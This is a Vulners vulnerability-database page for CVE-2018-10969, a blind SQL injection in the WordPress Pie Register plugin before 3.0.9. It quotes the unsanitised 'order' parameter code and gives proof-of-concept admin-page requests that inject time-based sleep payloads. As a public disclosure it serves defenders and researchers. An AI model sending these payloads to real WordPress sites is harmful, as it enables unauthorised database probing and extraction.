Vulners
Lucene search
WordPress Pie Register Plugin < 3.0.9 - Blind SQL Injection Vulnerability
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | WordPress Pie Register Plugin SQL Injection Vulnerability | 15 Jun 201800:00 | – | cnvd |
 | WordPress Pie Register Plugin SQL Injection (CVE-2018-10969) | 28 Jun 202000:00 | – | checkpoint_advisories |
 | CVE-2018-10969 | 17 Jun 201816:00 | – | cve |
 | CVE-2018-10969 | 17 Jun 201816:00 | – | cvelist |
 | WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection | 11 Jun 201800:00 | – | exploitdb |
 | WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection | 11 Jun 201800:00 | – | exploitpack |
 | CVE-2018-10969 | 17 Jun 201816:29 | – | nvd |
 | CVE-2018-10969 | 17 Jun 201816:29 | – | osv |
 | WordPress Pie Register Blind SQL Injection | 11 Jun 201800:00 | – | packetstorm |
 | Sql injection | 17 Jun 201816:29 | – | prion |
10
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969
# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.
# III. DESCRIPTION
# This bug was found using the portal in the files:
# /pie-register/classes/invitation_code_pagination.php: if ( isset(
# $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php: $order =
# $_GET['order'];
# And when the query is executed, the parameter "order" it is not sanitized.
# /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order );
# IV. PROOF OF CONCEPT
# The following URL have been confirmed to all suffer from Time Based SQL Injection.
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)
# 0day.today [2018-06-11] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jun 2018 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.18728